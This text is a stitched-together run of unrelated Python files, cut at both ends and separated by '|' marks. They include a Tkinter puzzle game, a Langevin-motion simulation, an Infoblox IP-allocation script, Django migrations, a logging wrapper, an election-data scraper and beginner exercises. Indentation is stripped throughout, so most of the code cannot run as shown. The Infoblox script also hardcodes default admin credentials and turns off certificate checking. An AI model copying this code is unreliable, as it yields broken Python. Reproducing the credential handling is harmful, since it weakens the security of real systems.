tileImage=ImageTk.PhotoImage(self.image.crop((x0,y0,x1,y1)))
tile=Tile(self,tileImage,(row,col))
tiles.add(tile)
if self.shuffle==True:
tiles.setGap(-1)
return tiles
class Main():
def __init__(self,parent):
self.parent=parent
self.image=StringVar()
self.winText = StringVar()
self.grid=IntVar()
self.directory = r'C:\Users\Hasin Choudhury\Desktop\PythonP\images'
self.imageCount=0
self.shuffle=True
self.createWidgets()
def createWidgets(self):
padx=10
pady=10
self.mainFrame = Frame(self.parent)
Label(self.mainFrame,text = 'Yay! A Puzzle!',font = ('',50)).pack(padx=padx,pady=pady)
frame = Frame(self.mainFrame)
Label(frame,text = 'Image').grid(sticky=W)
Entry(frame,textvariable = self.image,width=80).grid(row=0,column=1,padx=padx,pady=pady)
self.load = Button(frame,text='Load',command=self.load)
self.load.grid(row=0,column=2,pady=pady,padx=padx)
Label(frame,text = 'Grid Count (difficulty)').grid(sticky=W)
OptionMenu(frame,self.grid,*[2,3,4,5,6,7,8,9,10]).grid(row=1,column=1,padx=padx,pady=pady)
Label(frame,text = 'Show completed pic').grid(sticky=W)
self.result = Button(frame,text='Off',command=self.easyPeezy)
self.result.grid(row=2,column=1,pady=pady,padx=padx)
frame.pack(padx=padx,pady=pady)
Label(self.mainFrame,text = 'NOTE: Hit G to return to menu!!! (Coward, hence G. Seriously though, use it)',font = ('',12)).pack(padx=padx,pady=pady)
Button(self.mainFrame,text='Start',command=self.start).pack(padx=padx,pady=pady)
self.mainFrame.pack()
self.board = Frame(self.parent)
self.winFrame = Frame(self.parent)
Label(self.winFrame,textvariable=self.winText,font=('',50)).pack(padx=padx,pady=pady)
Button(self.winFrame,text='Play again',command=self.playAgain).pack(padx=padx,pady=pady)
#commands
def start(self):
image = self.image.get()
grid = self.grid.get()
if os.path.exists(image):
self.board=Board(self.parent,image,grid,self.win,self.shuffle,self.mainMenu)
self.mainFrame.pack_forget()
self.board.pack()
def easyPeezy(self):
if self.shuffle==True:
self.shuffle=not self.shuffle
self.result['text']='On'
elif self.shuffle==False:
self.shuffle=not self.shuffle
self.result['text']='Off'
def load(self):
images=[]
for filename in os.listdir(self.directory):
if filename.endswith(".jpg") or filename.endswith(".png"):
images.append(os.path.join(self.directory, filename))
else:
continue
self.image.set(images[self.imageCount])
self.load['text']='Load Next'
self.imageCount+=1
def win(self,moves):
print('you won')
self.board.pack_forget()
self.winText.set("Woohoo! You win with {0} moves".format(moves))
self.winFrame.pack()
def playAgain(self):
self.winFrame.pack_forget()
self.mainFrame.pack()
def mainMenu(self,nothing):
self.board.pack_forget()
self.mainFrame.pack()
if __name__=="__main__":
root = Tk()
Main(root)
print('test1')
root.mainloop()
|
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import seaborn as sns
from scipy import stats
from scipy.optimize import fsolve
#simulated data
N = 32768 #Number of data points
m = 2e-12 #1 nanogram
T = 300 #Kelvin
k = 300e-6 #kg/s2
gamma_factor = 30
f_sam = 65536 #Hz
dt = 1/f_sam
gamma2_crit = 4*m*k
gamma_crit = np.sqrt(4*m*k)
gamma2 = gamma2_crit/(gamma_factor**2) #
gamma = gamma_crit/gamma_factor #
omega0 = np.sqrt(k/m)
tau = m/gamma
omega = np.sqrt((omega0**2)-(1/(4*tau*tau)))
k_B = 1.38064881313131e-23 # Boltzmann constant (Newton metre/Kelvin)
D = k_B*T/gamma
simparams = (N, dt, omega, omega0, tau)
#Function to costruct sigma matrix
def sigmamatrix(simparams):
simparams = (N, dt, omega, omega0, tau)
ss1 = np.cos(2*omega*dt)-(2*omega*tau*np.sin(2*omega*dt))-(4*(omega0**2)*(tau**2))
ss2 = np.cos(2*omega*dt)+(2*omega*tau*np.sin(2*omega*dt))-(4*(omega0**2)*(tau**2))
sigma2_xx = (D/(4*(omega**2)*(omega0**2)*(tau**3)))*((4*(omega**2)*(tau**2))+(np.exp(-dt/tau))*(ss1))
sigma2_vv = (D/(4*(omega**2)*(tau**3)))*((4*(omega**2)*(tau**2))+(np.exp(-dt/tau))*(ss2))
sigma2_xv = (D/((omega**2)*(tau**2)))*(np.exp(-dt/tau)*np.sin(omega*dt)*np.sin(omega*dt))
return sigma2_xx, sigma2_vv, sigma2_xv
sigma_matrix = sigmamatrix(simparams)
#Function to construct exponential matrix
def explambda(simparams):
N, dt, omega, omega0, tau = simparams
I = np.eye(2)
J11 =(1/(2*omega*tau))
J12 = (1/omega)
J21 = -(omega0**2)/omega
J22 = -J11
J = np.matrix([[J11,J12],[J21,J22]])
return np.exp(-dt/(2*tau))*((np.cos(omega*dt)*I)+(np.sin(omega*dt)*J))
expM = explambda(simparams)
def simxv(simparams, sigma_matrix, expM):
N, dt, omega, omega0, tau = simparams
x = np.zeros([N,1])
v = np.zeros([N,1])
sigma2_xx, sigma2_vv, sigma2_xv = sigma_matrix
for j in np.arange(0,N-1):
oldvec = np.array([x[j],v[j]])
randgauss = np.random.randn(2,1)
delx = np.sqrt(sigma2_xx)*randgauss[0]
delv = (sigma2_xv/(np.sqrt(sigma2_xx)))*randgauss[0]+(np.sqrt(sigma2_vv - ((sigma2_xv**2)/(sigma2_xx))))*randgauss[1]
delvec = np.array([delx,delv])
updatevec = np.dot(expM,oldvec)+delvec
x[j+1] = updatevec[0]
v[j+1] = updatevec[1]
return x,v
x, v = simxv(simparams, sigma_matrix, expM)
x.tofile('position.txt', sep=" ", format="%s")
v.tofile('velocity.txt', sep=" ", format="%s") |
import re
lines = []
with open("inputData.txt", "r") as infile:
for line in infile:
lines.append(line.replace('\n', '').replace('\r', ''))
codeLetters = 0
escapedLetters = 0
for line in lines:
codeLetters += len(line)
escaped = re.escape(line)
escapedLetters += len(escaped) + 2 # + 2 for the two quotes we didn't add
difference = escapedLetters - codeLetters
print(str(difference))
|
#!/usr/bin/env python
# More verbose
import requests
import os
import json
requests.packages.urllib3.disable_warnings()
hostname = os.getenv('vmName')
domain = "cliqrdemo"
fqdn = hostname + "." + domain
network = os.getenv('networkName')
netmask = "255.255.255.0"
gateway = "10.110.5.1"
dns_server_list = "10.100.1.15,8.8.8.8"
#Get network reference
url = "https://10.110.5.254/wapi/v1.0/network"
querystring = {"*VLAN": network}
headers = {}
response = requests.request("GET", url, headers=headers, params=querystring, verify=False, auth=('admin', 'infoblox'))
netRef = response.json()[0]['_ref']
#Get next available IP address
url = "https://10.110.5.254/wapi/v1.0/"+netRef
querystring = {
"_function":"next_available_ip",
"num":"1"
}
headers = {}
response = requests.request("POST", url, headers=headers, params=querystring, verify=False, auth=('admin', 'infoblox'))
ip = response.json()['ips'][0]
#Create Host Record
url = "https://10.110.5.254/wapi/v1.0/record:host"
payload = {
"ipv4addrs":[
{
"ipv4addr":ip
}
],
"name": fqdn,
"configure_for_dns": True
}
headers = {'content-type': "application/json"}
response = requests.request("POST", url, data=json.dumps(payload), headers=headers, verify=False, auth=('admin', 'infoblox'))
#Echo key/values back to CloudCenter for VM creation
print "nicCount=1"
print "nicIP_0=" + ip
print "nicUseDhcp_0=false"
print "DnsServerList="+dns_server_list
print "nicGateway_0="+gateway
print "nicNetmask_0="+netmask
print "domainName="+domain
print "hwClockUTC=true"
print "timeZone=Canada/Eastern"
print "osHostname="+hostname
print "infobloxRef="+response.json()
|
import SWPlugin
import json
import os
import time
from SWParser import monster_name, monster_attribute
sources = {
1: 'Unknown',
2: 'Mystical',
3: 'Light & Dark',
4: 'Water',
5: 'Fire',
6: 'Wind',
7: 'Legendary',
8: 'Exclusive',
9: "Legendary Pieces",
10: "Light & Dark Pieces"
}
def identify_scroll(id):
return sources[id]
class SummonLogger(SWPlugin.SWPlugin):
def __init__(self):
with open('swproxy.config') as f:
self.config = json.load(f)
def process_request(self, req_json, resp_json):
config = self.config
if 'log_summon' not in config or not config['log_summon']:
return
command = req_json['command']
if command == 'SummonUnit':
return self.log_summon(req_json, resp_json, config)
def log_summon(self, req_json, resp_json, config):
if not config["log_summon"]:
return
if 'unit_list' in resp_json:
time = resp_json['unit_list'][0]['create_time']
if 'item_info' in resp_json:
scroll = identify_scroll(resp_json['item_info']['item_master_id'])
else:
mode = req_json['mode']
if mode == 3:
scroll = 'Crystal'
elif mode == 5:
scroll = 'Social'
unit_name = monster_name(resp_json['unit_list'][0]['unit_master_id'],'',False)
attribute = monster_attribute(resp_json['unit_list'][0]['attribute'])
grade = resp_json['unit_list'][0]['class']
awakened = str(resp_json['unit_list'][0]['unit_master_id'])
if int(awakened[-2]) == 0:
awake = 'No'
else:
awake = 'Yes'
log_entry = "%s,%s,%s,%s,%s*,%s" % (time,scroll,unit_name,attribute,grade,awake)
filename = "%s-summons.csv" % resp_json['wizard_info']['wizard_id']
if not os.path.exists(filename):
log_entry = 'Date,Summon Type,Unit,Attribute,Grade,Awakened\n' + log_entry
with open(filename, "a") as fr:
fr.write(log_entry)
fr.write('\n')
return
|
# Exercise 1
# To run this program go to the terminal and use the command `python exercise1.py`
print("Welcome to Python")
print('Enter your name:')
x = input()
print('Hello, ' + x)
# TODO:
# Get the users age and determine what year they were born.
# print('How old are you?')
# print('So you were born in' + x)
|
import cbmpy
import numpy as np
import os
import sys
import pandas as pd
modelLoc = sys.argv[1]
growthMediumLoc = sys.argv[2]
scriptLoc = sys.argv[3]
proteomicsLoc = sys.argv[4]
resultsFolder = sys.argv[5]
model = cbmpy.CBRead.readSBML3FBC(modelLoc, scan_notes_gpr = False)
growthData = pd.read_csv(growthMediumLoc)
proteomicsData = pd.read_csv(proteomicsLoc)
resultsPath = '%s/%s' %(scriptLoc, resultsFolder)
if not (os.path.isdir(resultsPath)): os.mkdir(resultsPath)
os.chdir(resultsPath)
"""
Metabolic constraints
"""
for i in growthData['Reaction ID']:
model.setReactionLowerBound(i, growthData['Lower Bound'].loc[growthData['Reaction ID']==i].values[0])
"""
Proteomic constraints
Should be commented out for the "w/o proteomic constraints" condition.
"""
for i in proteomicsData['Entry']:
if (proteomicsData['conc_mmolgDW'].loc[proteomicsData['Entry']==i].values[0] == ('#VALUE!')): continue
elif np.isnan(float(proteomicsData['conc_mmolgDW'].loc[proteomicsData['Entry']==i].values[0])): continue
elif (proteomicsData['conc_mmolgDW'].loc[proteomicsData['Entry']==i].values[0] == 0.0): continue
else: model.setReactionBounds('P_%s_synthesis' %(i), float(proteomicsData['0.9conc'].loc[proteomicsData['Entry']==i].values[0]), 1000.0)
"""
Total protein volume constraint for E. coli
See the supplementary material of the paper for the derivation of the constraint
"""
protSum=float(0.62/0.34)
pID = 'UP000000625'
constraint = []
UniProtIDs = pd.read_csv('proteinMasses.txt', sep = '\t')
for entry in UniProtIDs.index: constraint.append([(7.3*pow(10,-4)*float(UniProtIDs['Mass'][entry].replace(',', ''))), 'P_%s_synthesis' %(UniProtIDs['Entry'][entry])])
model.addUserConstraint(pid = None, fluxes = constraint, operator = '<=', rhs = protSum)
fbaResult = cbmpy.CBCPLEX.cplx_analyzeModel(model)
if np.isnan(float(fbaResult)): sys.exit(0) #terminate if infeasible
fva = cbmpy.CBCPLEX.cplx_FluxVariabilityAnalysis(model, pre_opt=True)
cbmpy.CBWrite.writeFVAdata(fva[0], fva[1], os.path.split(growthMediumLoc)[1])
|
# Generated by Django 3.2.8 on 2021-10-12 03:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("product", "0001_initial"),
]
operations = [
migrations.AlterModelOptions(
name="product",
options={"verbose_name": "Product", "verbose_name_plural": "Products"},
),
migrations.AddField(
model_name="product",
name="delivery",
field=models.CharField(
default="India", max_length=40, verbose_name="Delivery Country"
),
),
migrations.AlterField(
model_name="product",
name="warranty",
field=models.IntegerField(default=1, verbose_name="Warranty in Year"),
),
]
|
# Exercício 5.14 - Livro
soma = media = 0
qtd = 0
while True:
num = int(input(f'Digite o {qtd + 1}° número: '))
if num == 0:
break
qtd += 1
soma += num
media = soma / qtd
print('=-=' * 15)
print(f'Quantidade de números informados: {qtd}')
print(f'Soma de todos os valores: {soma}')
print(f'Média dos valores: {media:.2f}')
|
__author__ = 'Justin'
from sklearn.linear_model import LogisticRegression
import os
import json
import networkx as nx
import numpy as np
from GetRouteInfo import routeinfo
persons = ['Justin','Justin2','Pablo']
for person in persons:
# Load Data
cwd = os.getcwd()
folder = os.path.abspath(os.path.join(cwd, '..', 'Project Data','UserWeights',person))
filename = 'PathOptions'
filepath = os.path.abspath(os.path.join(folder,filename))
with open(filepath) as json_data:
PathOptions = json.load(json_data)
filename = 'Choices'
filepath = os.path.abspath(os.path.join(folder,filename))
with open(filepath) as json_data:
Choices = json.load(json_data)
filename = "OSMNetworkReducedSet.gexf"
filepath = os.path.abspath(os.path.join(cwd, '..', 'Project Data','Networks',filename))
fh=open(filepath,'rb')
G = nx.read_gexf(fh)
fh.close
# Format Data
y = []
X = []
for index,choice in enumerate(Choices):
if(choice == '1'): # Zen Chosen
y.append(1)
elif(choice == '2'): # Fastest Chosen
y.append(0)
if(choice == '1' or choice == '2'):
zenRoute = PathOptions[index]['Zen']
fastestRoute = PathOptions[index]['Fast']
zenRouteInfo = routeinfo(G,zenRoute,['currenttime','Zenness'])
fastestRouteInfo = routeinfo(G,fastestRoute,['currenttime','Zenness'])
ZenDiff = (fastestRouteInfo['Zenness']-zenRouteInfo['Zenness'])/fastestRouteInfo['Zenness']
TimeDiff = (zenRouteInfo['currenttime']-fastestRouteInfo['currenttime'])/zenRouteInfo['currenttime']
X.append([ZenDiff,TimeDiff])
# Logistic Regression
model = LogisticRegression()
model = model.fit(np.array(X),np.array(y))
print('Model Accuracy: '+str(model.score(X,y)))
print('Average Rate: '+str(np.mean(y)))
# Plot Logistic Regression
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
xx, yy = np.mgrid[0:1:0.1, 0:1:0.1]
grid = np.c_[xx.ravel(), yy.ravel()]
probs = model.predict_proba(grid)[:, 1].reshape(xx.shape)
surf = ax.plot_surface(xx, yy, probs, cmap=cm.coolwarm,
linewidth=0, antialiased=False)
fig.colorbar(surf, shrink=0.5, aspect=5)
# ax.plot_wireframe(xx, yy, probs, rstride=10, cstride=10)
plt.xlabel('Percentage Zen Decrease')
plt.ylabel('Percentage Time Decrease')
plt.title(person)
ax.set_zlabel('Probability of ZenRoute')
# Show All Graphs at Once
plt.show() |
class Problem:
def __init__(self, probId, lines = [], name = 'test', points = [], problemType = 'plot', prompts = [], solution = None, text = '', probType = 'Default'):
self.id = probId
self.lines = lines
self.name = name
self.points = points
self.prompts = prompts
self.solution = solution
self.text = text
self.type= probType
def __str__(self):
string = []
string.append(str(self.id))
string.append(', ')
string.append(str(self.solution))
return ''.join(string)
def __repr__(self):
return str(self)
class Solution:
def __init__(self, lines = [], points = []):
self.lines = lines
self.points = points
def __str__(self):
# expects only one point for the answer
return(str(self.points[0]))
class Point:
def __init__(self, name, x, y):
self.name = name
self.x = x
self.y = y
def __str__(self):
string = []
string.append(self.name)
string.append(' (')
string.append(str(self.x))
string.append(', ')
string.append(str(self.y))
string.append(')')
return ''.join(string)
def __repr__(self):
return(str(self))
class Step:
def __init__(self,label,name,op,problemId=0,state=None):
self.label = label
self.name = name
# print(op)
self.op = op
# to detect a specific bug
self.problemId = problemId
self.state = state
def __str__(self):
string = []
string.append(self.label)
return ''.join(string)
def __repr__(self):
return(str(self))
class Op:
def __init__(self,distance,angle):
self.distance = distance
self.angle = angle
# Note: biased to return distance; the two should not coexist!
def __str__(self):
if self.distance:
return str(self.distance)
if self.angle:
return str(self.angle)
class Answer:
def __init__(self,lines,points):
self.lines = lines,
self.points = points
def __str__(self):
return str(self.points)
def __repr__(self):
return str(self)
|
banco = {} # banco para verificar caso a palavra ja exista
inicio = 0 # demarcar o inicio da substring
maior = 0 # maior substring ate o momento
# s = string qualquer
# enumerate para sabermos onde estamos e termos o valor
for i, v in enumerate(s):
if v in banco: # verifica se a letra ja está no banco
x = banco[v] + 1 # pegamos a ultima posição para verificar se esta dentro da atual substring
if x >= inicio: #caso esteja
inicio = x + 1 # inicio agora é a ultima posição da letra + 1
tamanho = i - inicio + 1 # aqui calculamos o tamanho da substring
if tamanho > maior: #verificamos se é maior que o maior
maior = tamanho # caso seja temos um novo maior
banco[v] = i # atualizamos a ultima posição da letra atual
print(maior) |
# -*- coding: utf-8 -*-
__author__ = 'Tan Chao'
'''
Python logging module wrapper.
'''
import logging
import logging.handlers as LH
import os
import platform
import sys
import time
import traceback
import types
# Logging Levels
# From high to low
LEVEL_CRITICAL = logging.CRITICAL # 50
LEVEL_ERROR = logging.ERROR # 40
LEVEL_WARNING = logging.WARNING # 30, ==WARN
LEVEL_INFO = logging.INFO # 20
LEVEL_DEBUG = logging.DEBUG # 10
LEVEL_NOTSET = logging.NOTSET # 0
LEVEL_CUSTOME = 5 # define your own level
# handler type
HANDLER_STREAM = 'stream'
HANDLER_SYSLOG = 'syslog'
HANDLER_FILE = 'file'
HANDLER_CUSTOME = 'custom'
# Logger Config
DATE_FMT = '%Y-%m-%d_%H-%M-%S'
SYSLOG_ADDRESS = '/dev/log'
SYSLOG_FACILITY = LH.SysLogHandler.LOG_LOCAL1
LOG_PATH = 'log' + os.sep
FORMATTER = '-'.join(['%(asctime)s', '%(tag)s', '%(name)s', '%(filename)s', '%(levelname)s', '%(message)s'])
def log_traceback_hook(self):
'''self is logger
Catch except and output it by logger.
'''
self.error(traceback.format_exc())
def get_cur_time():
return time.strftime(DATE_FMT)
def method_type(method, instance):
if sys.version_info >= (3, 2): # 3.x
new_method = types.MethodType(method, instance)
else: # 2.x
new_method = types.MethodType(method, instance, instance.__class__)
return new_method
class LoggerManager(object):
created_loggers = set()
log_level = LEVEL_DEBUG
log_handler = HANDLER_STREAM
log_tag = ''
custom_handler = None
@staticmethod
def get_logger(logger_name):
'''If the logger is exist, then return it directly.'''
if logger_name not in LoggerManager.created_loggers:
LoggerManager.create_logger(logger_name)
logger = logging.getLogger(logger_name)
if LoggerManager.log_handler == HANDLER_SYSLOG and platform.system() == 'Linux':
logger = logging.LoggerAdapter(logger, {'logger_name': logger_name})
return logger
@staticmethod
def create_logger(logger_name):
# create logger
logger = logging.getLogger(logger_name)
logger.log_except = method_type(log_traceback_hook, logger) # add a method to logger
logger.setLevel(LoggerManager.log_level)
# create handler
if LoggerManager.log_handler == HANDLER_SYSLOG:
if platform.system() == 'Linux':
handler = LH.SysLogHandler(SYSLOG_ADDRESS, facility=SYSLOG_FACILITY)
else: # Windows, Mac
handler = logging.FileHandler(LoggerManager.get_filename(), encoding='utf8')
elif LoggerManager.log_handler == HANDLER_FILE:
handler = logging.FileHandler(LoggerManager.get_filename(), encoding='utf8')
elif LoggerManager.log_handler == HANDLER_CUSTOME:
handler = LoggerManager.custom_handler()
else:
handler = logging.StreamHandler()
# create formatter
fmt = FORMATTER.replace('%(tag)s', LoggerManager.log_tag)
formatter = logging.Formatter(fmt)
handler.setFormatter(formatter)
handler.setLevel(LoggerManager.log_level)
logger.addHandler(handler)
LoggerManager.created_loggers.add(logger_name)
@staticmethod
def get_filename():
return LOG_PATH + LoggerManager.log_tag + "_" + get_cur_time() + '.log'
@staticmethod
def set_log_level(level):
LoggerManager.log_level = level
for name in LoggerManager.created_loggers:
logger = logging.getLogger(name)
logger.setLevel(level)
for handler in logger.handlers:
handler.setLevel(level)
@staticmethod
def set_log_handler(handler):
LoggerManager.log_handler = handler
@staticmethod
def set_log_tag(log_tag):
LoggerManager.log_tag = log_tag
@staticmethod
def set_custom_handler(handler):
LoggerManager.log_handler = HANDLER_CUSTOME
LoggerManager.custom_handler = handler
class Logger(object):
def __init__(self, logger):
self.logger = logger
def log(self, log):
self.logger.info('%s' % (log))
def main():
LoggerManager.set_log_tag('app')
LoggerManager.set_log_level(LEVEL_INFO)
logger = LoggerManager.get_logger('client')
logger.debug('debug message')
logger.info('info message')
logger.warn('warn message')
logger.error('error message')
logger.critical('critical message')
# logger.exception('exception message') # python3 error
LoggerManager.set_log_level(LEVEL_DEBUG)
logger.debug('debug message new......')
loggerWraper = Logger(logger)
loggerWraper.log('test Logger')
LoggerManager.set_log_handler(HANDLER_SYSLOG)
loggerFile = LoggerManager.get_logger('server')
loggerFile.info('start ok.')
try:
print(1/0)
except:
logger.log_except()
if __name__ == '__main__':
main()
|
from rooms import Room
class MyMaze(Room):
def __init__ (self, st= None, ex = None):
self.__start = st
self.__exit = ex
self.__current = st
def getCurrent(self):
return self.__current
def moveNorth(self):
if self.getNorth() == None:
return False
else:
self.__current = self.getNorth()
return True
def moveSouth(self):
if self.getSouth() == None:
return False
else:
self.__current = self.getSouth()
return True
def moveWest(self):
if self.getWest() == None:
return False
else:
self.__current = self.getWest()
return True
def moveEast(self):
if self.getEast() == None:
return False
else:
self.__current = self.getEast()
return True
def atExit(self):
if self.__current == self.__exit:
return True
else:
return False
def reset(self):
self.__current == self.__start
|
import socket
import sys
from threading import Thread
from time import sleep
class Session:
def __init__(self):
self.client1 = socket.socket(socket.AF_INET,socket.SOCK_STREAM) # open socket
def SocketsConnection(self):
try:
self.client1.connect(("127.0.0.1", 10000)) # open connection with the server
except socket.error as e:
print("Error creating socket: %s" % e)
sys.exit(1)
def SocketCloser(self):
self.client1.close()
|
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
import tornado.log
import tornado.autoreload
from mainsrv import app
import logging
import os
import sys
print("\033[92mLOCAL WEB SERVER MODE\033[0m" if "local" in sys.argv else None)
tornado.autoreload.start()
tornado.log.access_log.setLevel(logging.INFO)
if "local" in sys.argv:
http_server = HTTPServer(WSGIContainer(app))
os.system('color 0')
http_server.listen(80)
else:
http_server = HTTPServer(WSGIContainer(app), ssl_options={
# path to your SSL files
"certfile": os.path.join("/home/pi/Документы/PEM/certificate.crt"),
"keyfile": os.path.join("/home/pi/Документы/PEM/private.key"),
})
http_server.bind(443)
http_server.start(0)
IOLoop.instance().start()
|
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 22 20:54:00 2016
@author: mjguidry
"""
import requests, tempfile
url='http://sos.nh.gov/WorkArea/DownloadAsset.aspx?id=28313'
resp = requests.get(url)
tempdir=tempfile.tempdir
tmp_file=tempdir+'/temp_nh.xls'
rep_dir='../'
output = open(tmp_file, 'wb')
output.write(resp.content)
output.close()
import xlrd, re
wb=xlrd.open_workbook(tmp_file)
sheets = wb.sheet_names()
results_dict=dict()
cols_dict=dict()
candidates=['Romney','Obama','Johnson','Goode','Paul','Stein','Scatter']
candidate_dict={'Romney':{'name':'Mitt Romney' ,
'party':'R',
'winner':False},
'Obama' :{'name':'Barack Obama',
'party':'D',
'winner':True},
'Johnson' :{'name':'Gary Johnson',
'party':'LIB',
'winner':False},
'Goode':{'name':'Virgil Goode' ,
'party':'CON',
'winner':False},
'Paul' :{'name':'Ron Paul',
'party':'IND',
'winner':False},
'Stein' :{'name':'Jill Stein',
'party':'IND',
'winner':False},
'Scatter' :{'name':'Scatter',
'party':'',
'winner':False}}
for sheet in sheets:
ws = wb.sheet_by_name(sheet)
start_flag=0
stop_flag=0
for row in range(ws.nrows):
if(start_flag==1 and stop_flag==0):
if('TOTALS' in ws.cell(row,0).value):
stop_flag=1
else:
town=ws.cell(row,0).value
town=re.sub('\s+\Z','',town)
town=re.sub('\*','',town)
results_dict[town]=dict()
results_dict[town]['county']=county
for col in range(1,ws.ncols):
candidate=cols_dict[col]
value=ws.cell(row,col).value
if(value=='' or value==' '):
results_dict[town][candidate]=0
else:
results_dict[town][candidate]=int(value)
try:
if('County' in ws.cell(row,0).value):
value=ws.cell(row,0).value
start_flag=1
stop_flag=0
county=re.search('.*(?=\sCounty)',value).group(0)
for col in range(1,ws.ncols):
candidate=[x for x in candidates if x in ws.cell(row,col).value][0]
cols_dict[col]=candidate
except:
pass
# Debug print statements
# print 'Romney results ', sum([results_dict[x]['Romney'] for x in results_dict.keys()])
# print 'Obama results ', sum([results_dict[x]['Obama'] for x in results_dict.keys()])
# Clean up multiple wards into one set of results per town
wards=[x for x in results_dict.keys() if 'Ward' in x]
towns=set([re.search('.*(?=\sWard)',x).group(0) for x in wards])
for town in towns:
results_dict[town]=dict()
town_wards=[x for x in wards if town in x]
county=results_dict[town_wards[0]]['county']
results_dict[town]['county']=county
for candidate in candidates:
results_dict[town][candidate]=sum([results_dict[x][candidate] for x in town_wards])
for ward in town_wards:
del results_dict[ward]
import csv
csvfile=open(rep_dir+'/20121106__nh__general__president__town.csv','wb')
csvwriter=csv.writer(csvfile)
csvwriter.writerow(['town',
'county',
'office',
'district',
'party',
'candidate',
'winner',
'votes'])
for candidate in candidates:
for town in sorted(results_dict.keys()):
csvwriter.writerow([town,
results_dict[town]['county'],
'President',
'',
candidate_dict[candidate]['party'],
candidate_dict[candidate]['name'],
candidate_dict[candidate]['winner'],
results_dict[town][candidate]
])
csvfile.close()
import pickle
county_dict=dict()
for town in sorted(results_dict.keys()):
county_dict[town]=results_dict[town]['county']
f=open('county.pkl','wb')
pickle.dump(county_dict,f)
f.close()
|
# Generated by Django 2.0.7 on 2018-07-30 11:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post_app', '0007_auto_20180730_1433'),
]
operations = [
migrations.AddField(
model_name='comment',
name='comment',
field=models.CharField(blank=True, default='', max_length=250),
),
]
|
# test 1
# dog类
class Dog:
# __init__()方法必须有,每次实例化类的时候都会执行该方法
def __init__(self, name, age):
self.name = name
self.age = age
# 为属性设置默认值
self.color = 'yellow'
def sit(self):
print(self.name.title() + " now is sitting.")
def roll_over(self):
print(self.name.title() + " roll over.")
def message(self):
print(self.name + " is " + str(self.age) + " years old and it's color is " + self.color)
def update_color(self, color):
self.color = color
# 实例化
my_dog = Dog('willim', 6)
# 访问属性
print(my_dog.name + " is " + str(my_dog.age))
# 调用方法
my_dog.sit()
my_dog.roll_over()
my_dog.message()
# test 2
# 修改属性:直接访问属性并修改;通过内置方法修改
my_dog.color = 'blue'
my_dog.message()
my_dog.update_color('black')
my_dog.message()
|
#coding=utf-8
import os
import sys
import logging
from scrapy.crawler import CrawlerProcess
from scrapy.utils.log import configure_logging
from scrapy.utils.project import get_project_settings
def run(name):
configure_logging(install_root_handler = False)
logging.basicConfig(
filename = 'log/%s.log' % name,
format = '%(levelname)s %(asctime)s: %(message) s',
level = logging.DEBUG
)
process = CrawlerProcess(get_project_settings())
try:
logging.info('run start spider: %s' % name)
process.crawl(name)
process.start()
except Exception as e:
logging.error('run spider: %s exception: %s' % (name, e))
def main():
from scrapy import cmdline
cmdline.execute("scrapy crawl douban_music".split())
cmdline.execute("scrapy crawl douban_video".split())
if __name__ == '__main__':
name = sys.argv[1] or 'demo'
print('name: %s' % name)
print('project dir: %s' % os.getcwd())
run(name)
|
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
]
__title__ = "vivarium_public_health"
__summary__ = "Components for modelling diseases, risks, and interventions with ``vivarium``"
__uri__ = "https://github.com/ihmeuw/vivarium_public_health"
__version__ = "0.10.14"
__author__ = "The vivarium_public_health developers"
__email__ = "vivarium.dev@gmail.com"
__license__ = "BSD-3-Clause"
__copyright__ = f"Copyright 2021 {__author__}"
|
import os
import random
import string
from bitcoin_acks.database.session import get_url
def generate_secret():
alphanumeric = string.ascii_uppercase + string.ascii_lowercase + string.digits
x = ''.join(random.choice(alphanumeric) for _ in range(32))
return x
class Config(object):
DEBUG = False
FLASK_ADMIN_FLUID_LAYOUT = True
SECRET_KEY = os.environ.get('SECRET_KEY', default=generate_secret())
SQLALCHEMY_DATABASE_URI = get_url()
SQLALCHEMY_TRACK_MODIFICATIONS = False
|
import os
import typing
from enum import Enum
import boto3
class CloudwatchHandler:
def __init__(self):
self.namespace = f"dcp-wide-test-{os.environ['DEPLOYMENT_ENV']}"
self._client = boto3.client("cloudwatch", region_name=os.environ['AWS_DEFAULT_REGION'])
def put_metric_data(self,
metric_name,
metric_value):
"""
Puts a cloudwatch metric data point
:param metric_name: The name of the metric to put
:param metric_value: value of metric to put
"""
metric_data = {
'MetricName': metric_name,
'Value': metric_value
}
self._client.put_metric_data(MetricData=[metric_data], Namespace=self.namespace)
|
import pandas
import cv2
from glob import iglob
import os
'''
This script will list full path for training set indexing (ls command not working when list too long, need sequential approach)
'''
source = 'data-cleaning/dataset/crowdhuman-coco-yolo/images/train/'
# make sure destination is empty
destination = 'data-cleaning/dataset/crowdhuman-coco-yolo/train.txt'
source = 'data-cleaning/dataset/crowdhuman-coco-yolo/images/val/'
# make sure destination is empty
destination = 'data-cleaning/dataset/crowdhuman-coco-yolo/val.txt'
count = 0
for filename in sorted(iglob(source + '*.jpg')):
count += 1
#if count%10 == 0:
print(count)
with open(destination, 'a') as file:
file.write(filename + '\n')
#break
|
from django.core.files.base import ContentFile
from django.core.management.base import BaseCommand
import requests
import kronos
from nba_py.player import PlayerList, PlayerGeneralSplits
from players.models import Player
from teams.models import Team
from seasons.models import Season, PlayerSeason
@kronos.register('0 0 * * *') # Once a day
class Command(BaseCommand):
help = 'Add/update all NBA players from current season'
def add_arguments(self, parser):
parser.add_argument(
'--skip',
action='store_true',
dest='skip',
default=False,
help='Skip existing players',
)
def handle(self, *args, **options):
all_players = PlayerList().info()
for api_player in all_players:
info_msg = "'{} ({})'".format(
api_player['DISPLAY_FIRST_LAST'],
api_player['PERSON_ID']
)
# Get the player, or create him if doesn't exist
qs = Player.objects.filter(PERSON_ID=api_player['PERSON_ID'])
if qs.exists():
if options['skip']:
self.stdout.write(
self.style.SUCCESS("Skipping " + info_msg)
)
continue
player = qs[0]
self.stdout.write(self.style.SUCCESS("Updating " + info_msg))
else:
player = Player()
self.stdout.write(self.style.SUCCESS("Adding " + info_msg))
try:
